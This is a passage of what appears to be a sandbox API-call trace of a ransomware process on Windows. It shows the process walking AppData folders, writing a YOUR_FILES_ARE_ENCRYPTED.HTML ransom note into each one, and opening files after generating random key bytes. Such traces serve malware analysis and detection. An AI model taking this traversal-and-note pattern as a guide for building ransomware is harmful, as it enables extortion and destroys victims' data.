nFileSizeLow=0x0, dwReserved0=0x628c8e, dwReserved1=0x628c48, cFileName="..", cAlternateFileName="")) returned 0 [0110.666] FindClose (in: hFindFile=0x626878 | out: hFindFile=0x626878) returned 1 [0110.666] wnsprintfW (in: pszDest=0x6c47b8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Temp\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 69 [0110.666] GetProcessHeap () returned 0x600000 [0110.666] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x3183de0 [0110.667] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Temp\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\default\\appdata\\local\\temp\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x308 [0110.667] WriteFile (in: hFile=0x308, lpBuffer=0x3183de0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19eab8, lpOverlapped=0x0 | out: lpBuffer=0x3183de0*, lpNumberOfBytesWritten=0x19eab8*=0x3c00, lpOverlapped=0x0) returned 1 [0110.668] CloseHandle (hObject=0x308) returned 1 [0110.668] GetProcessHeap () returned 0x600000 [0110.668] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3183de0 | out: hHeap=0x600000) returned 1 [0110.668] GetProcessHeap () returned 0x600000 [0110.668] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6c47b8 | out: hHeap=0x600000) returned 1 [0110.669] FindNextFileW (in: hFindFile=0x626cf8, lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x5d599f22, ftCreationTime.dwHighDateTime=0x1d7005f, ftLastAccessTime.dwLowDateTime=0x5d599f22, ftLastAccessTime.dwHighDateTime=0x1d7005f, ftLastWriteTime.dwLowDateTime=0x5d599f22, ftLastWriteTime.dwHighDateTime=0x1d7005f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x620c18, cFileName="Temporary Internet Files", cAlternateFileName="TEMPOR~1")) returned 1 [0110.669] StrStrIW (lpFirst="Temporary Internet Files", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0110.669] wnsprintfW (in: pszDest=0x6b47b0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Temporary Internet Files") returned 59 [0110.669] GetProcessHeap () returned 0x600000 [0110.669] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x6c47b8 [0110.670] lstrcpyW (in: lpString1=0x6c47b8, lpString2="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Temporary Internet Files" | out: lpString1="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Temporary Internet Files") returned="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Temporary Internet Files" [0110.670] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Temporary Internet Files", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Temporary Internet Files\\*") returned="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Temporary Internet Files\\*" [0110.670] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Temporary Internet Files\\*", lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd9eaaa, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xd9eaaa, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xd9eaaa, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x628c8e, dwReserved1=0x628c48, cFileName="..", cAlternateFileName="翿")) returned 0xffffffff [0110.670] GetProcessHeap () returned 0x600000 [0110.671] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6c47b8 | out: hHeap=0x600000) returned 1 [0110.671] FindNextFileW (in: hFindFile=0x626cf8, lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x5d599f22, ftCreationTime.dwHighDateTime=0x1d7005f, ftLastAccessTime.dwLowDateTime=0x5d599f22, ftLastAccessTime.dwHighDateTime=0x1d7005f, ftLastWriteTime.dwLowDateTime=0x5d599f22, ftLastWriteTime.dwHighDateTime=0x1d7005f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x620c18, cFileName="Temporary Internet Files", cAlternateFileName="TEMPOR~1")) returned 0 [0110.671] FindClose (in: hFindFile=0x626cf8 | out: hFindFile=0x626cf8) returned 1 [0110.671] wnsprintfW (in: pszDest=0x6b47b0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 64 [0110.671] GetProcessHeap () returned 0x600000 [0110.671] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x3183de0 [0110.672] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\default\\appdata\\local\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x304 [0110.672] WriteFile (in: hFile=0x304, lpBuffer=0x3183de0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19edcc, lpOverlapped=0x0 | out: lpBuffer=0x3183de0*, lpNumberOfBytesWritten=0x19edcc*=0x3c00, lpOverlapped=0x0) returned 1 [0110.673] CloseHandle (hObject=0x304) returned 1 [0110.673] GetProcessHeap () returned 0x600000 [0110.673] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3183de0 | out: hHeap=0x600000) returned 1 [0110.673] GetProcessHeap () returned 0x600000 [0110.673] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6b47b0 | out: hHeap=0x600000) returned 1 [0110.674] FindNextFileW (in: hFindFile=0x626778, lpFindFileData=0x19ee14 | out: lpFindFileData=0x19ee14*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd9eaaa, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xd9eaaa, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xd9eaaa, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x620c3a, dwReserved1=0x620c10, cFileName="Roaming", cAlternateFileName="")) returned 1 [0110.674] StrStrIW (lpFirst="Roaming", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0110.674] wnsprintfW (in: pszDest=0x3173dd8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Roaming") returned 36 [0110.674] GetProcessHeap () returned 0x600000 [0110.675] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x6b47b0 [0110.675] lstrcpyW (in: lpString1=0x6b47b0, lpString2="\\\\?\\C:\\Users\\Default\\AppData\\Roaming" | out: lpString1="\\\\?\\C:\\Users\\Default\\AppData\\Roaming") returned="\\\\?\\C:\\Users\\Default\\AppData\\Roaming" [0110.675] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\Default\\AppData\\Roaming", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\*") returned="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\*" [0110.675] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\*", lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd9eaaa, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xd9eaaa, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xd9eaaa, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x620c18, cFileName=".", cAlternateFileName="")) returned 0x626cf8 [0110.676] FindNextFileW (in: hFindFile=0x626cf8, lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd9eaaa, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xd9eaaa, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xd9eaaa, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x620c18, cFileName="..", cAlternateFileName="")) returned 1 [0110.676] FindNextFileW (in: hFindFile=0x626cf8, lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xd9eaaa, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xd9eaaa, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xd9eaaa, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x620c18, cFileName="Microsoft", cAlternateFileName="MICROS~1")) returned 1 [0110.676] StrStrIW (lpFirst="Microsoft", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0110.676] wnsprintfW (in: pszDest=0x6b47b0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft") returned 46 [0110.676] GetProcessHeap () returned 0x600000 [0110.676] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x6c47b8 [0110.676] lstrcpyW (in: lpString1=0x6c47b8, lpString2="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft" | out: lpString1="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft") returned="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft" [0110.676] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\*") returned="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\*" [0110.676] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\*", lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xd9eaaa, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xd9eaaa, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xd9eaaa, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x628c92, dwReserved1=0x628c48, cFileName=".", cAlternateFileName="")) returned 0x626a38 [0110.677] FindNextFileW (in: hFindFile=0x626a38, lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xd9eaaa, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xd9eaaa, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xd9eaaa, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x628c92, dwReserved1=0x628c48, cFileName="..", cAlternateFileName="")) returned 1 [0110.677] FindNextFileW (in: hFindFile=0x626a38, lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd9eaaa, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xd9eaaa, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xd9eaaa, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x628c92, dwReserved1=0x628c48, cFileName="Internet Explorer", cAlternateFileName="INTERN~1")) returned 1 [0110.677] StrStrIW (lpFirst="Internet Explorer", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0110.677] wnsprintfW (in: pszDest=0x6c47b8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer") returned 64 [0110.677] GetProcessHeap () returned 0x600000 [0110.677] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x313b008 [0110.678] lstrcpyW (in: lpString1=0x313b008, lpString2="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer" | out: lpString1="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer") returned="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer" [0110.678] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\*") returned="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\*" [0110.678] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\*", lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd9eaaa, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xd9eaaa, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xd9eaaa, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6363f0, dwReserved1=0x628c50, cFileName=".", cAlternateFileName="")) returned 0x626838 [0110.678] FindNextFileW (in: hFindFile=0x626838, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd9eaaa, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xd9eaaa, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xd9eaaa, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6363f0, dwReserved1=0x628c50, cFileName="..", cAlternateFileName="")) returned 1 [0110.679] FindNextFileW (in: hFindFile=0x626838, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xd9eaaa, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xf6600cb, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xf6600cb, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6363f0, dwReserved1=0x628c50, cFileName="Quick Launch", cAlternateFileName="QUICKL~1")) returned 1 [0110.679] StrStrIW (lpFirst="Quick Launch", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0110.679] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch") returned 77 [0110.679] GetProcessHeap () returned 0x600000 [0110.679] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x314b010 [0110.679] lstrcpyW (in: lpString1=0x314b010, lpString2="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch" | out: lpString1="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch") returned="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch" [0110.679] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\*") returned="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\*" [0110.679] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\*", lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xd9eaaa, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xf6600cb, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xf6600cb, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6401aa, dwReserved1=0x640128, cFileName=".", cAlternateFileName="")) returned 0x6267b8 [0110.679] FindNextFileW (in: hFindFile=0x6267b8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xd9eaaa, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xf6600cb, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xf6600cb, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6401aa, dwReserved1=0x640128, cFileName="..", cAlternateFileName="")) returned 1 [0110.680] FindNextFileW (in: hFindFile=0x6267b8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0xf6600cb, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x9ee52126, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x9ee78381, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x94, dwReserved0=0x6401aa, dwReserved1=0x640128, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0110.680] StrStrIW (lpFirst="desktop.ini", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0110.680] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\desktop.ini") returned 89 [0110.680] PathFindExtensionW (pszPath="desktop.ini") returned=".ini" [0110.680] lstrlenW (lpString=".ini") returned 4 [0110.680] PathFindExtensionW (pszPath="desktop.ini") returned=".ini" [0110.680] SystemFunction036 (in: RandomBuffer=0x19e16c, RandomBufferLength=0x20 | out: RandomBuffer=0x19e16c) returned 1 [0110.680] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\desktop.ini" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\internet explorer\\quick launch\\desktop.ini"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x310 [0110.680] GetFileSizeEx (in: hFile=0x310, lpFileSize=0x19e190 | out: lpFileSize=0x19e190*=148) returned 1 [0110.680] CloseHandle (hObject=0x310) returned 1 [0110.680] FindNextFileW (in: hFindFile=0x6267b8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x251fff9e, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x251fff9e, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x251fff9e, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x160, dwReserved0=0x6401aa, dwReserved1=0x640128, cFileName="Shows Desktop.lnk", cAlternateFileName="")) returned 1 [0110.680] StrStrIW (lpFirst="Shows Desktop.lnk", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0110.681] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\Shows Desktop.lnk") returned 95 [0110.681] PathFindExtensionW (pszPath="Shows Desktop.lnk") returned=".lnk" [0110.681] lstrlenW (lpString=".lnk") returned 4 [0110.681] PathFindExtensionW (pszPath="Shows Desktop.lnk") returned=".lnk" [0110.681] FindNextFileW (in: hFindFile=0x6267b8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x252261fd, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x252261fd, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x252261fd, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x14e, dwReserved0=0x6401aa, dwReserved1=0x640128, cFileName="Window Switcher.lnk", cAlternateFileName="")) returned 1 [0110.681] StrStrIW (lpFirst="Window Switcher.lnk", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0110.681] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\Window Switcher.lnk") returned 97 [0110.681] PathFindExtensionW (pszPath="Window Switcher.lnk") returned=".lnk" [0110.681] lstrlenW (lpString=".lnk") returned 4 [0110.681] PathFindExtensionW (pszPath="Window Switcher.lnk") returned=".lnk" [0110.681] FindNextFileW (in: hFindFile=0x6267b8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x252261fd, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x252261fd, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x252261fd, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x14e, dwReserved0=0x6401aa, dwReserved1=0x640128, cFileName="Window Switcher.lnk", cAlternateFileName="")) returned 0 [0110.681] FindClose (in: hFindFile=0x6267b8 | out: hFindFile=0x6267b8) returned 1 [0110.681] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 107 [0110.681] GetProcessHeap () returned 0x600000 [0110.681] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x3184de8 [0110.681] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\internet explorer\\quick launch\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x32c [0110.683] WriteFile (in: hFile=0x32c, lpBuffer=0x3184de8*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e490, lpOverlapped=0x0 | out: lpBuffer=0x3184de8*, lpNumberOfBytesWritten=0x19e490*=0x3c00, lpOverlapped=0x0) returned 1 [0110.684] CloseHandle (hObject=0x32c) returned 1 [0110.684] GetProcessHeap () returned 0x600000 [0110.684] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3184de8 | out: hHeap=0x600000) returned 1 [0110.684] GetProcessHeap () returned 0x600000 [0110.684] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x314b010 | out: hHeap=0x600000) returned 1 [0110.685] FindNextFileW (in: hFindFile=0x626838, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xd9eaaa, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xf6600cb, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xf6600cb, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6363f0, dwReserved1=0x628c50, cFileName="Quick Launch", cAlternateFileName="QUICKL~1")) returned 0 [0110.685] FindClose (in: hFindFile=0x626838 | out: hFindFile=0x626838) returned 1 [0110.685] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 94 [0110.685] GetProcessHeap () returned 0x600000 [0110.685] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x3183de0 [0110.686] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\internet explorer\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x30c [0110.686] WriteFile (in: hFile=0x30c, lpBuffer=0x3183de0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e7a4, lpOverlapped=0x0 | out: lpBuffer=0x3183de0*, lpNumberOfBytesWritten=0x19e7a4*=0x3c00, lpOverlapped=0x0) returned 1 [0110.687] CloseHandle (hObject=0x30c) returned 1 [0110.687] GetProcessHeap () returned 0x600000 [0110.687] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3183de0 | out: hHeap=0x600000) returned 1 [0110.687] GetProcessHeap () returned 0x600000 [0110.687] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x313b008 | out: hHeap=0x600000) returned 1 [0110.688] FindNextFileW (in: hFindFile=0x626a38, lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd9eaaa, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xd9eaaa, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xd9eaaa, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x628c92, dwReserved1=0x628c48, cFileName="Windows", cAlternateFileName="")) returned 1 [0110.688] FindNextFileW (in: hFindFile=0x626a38, lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd9eaaa, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xd9eaaa, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xd9eaaa, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x628c92, dwReserved1=0x628c48, cFileName="Windows", cAlternateFileName="")) returned 0 [0110.688] FindClose (in: hFindFile=0x626a38 | out: hFindFile=0x626a38) returned 1 [0110.688] wnsprintfW (in: pszDest=0x6c47b8, cchDest=32768, pszFmt="%ls\\%ls" | out: 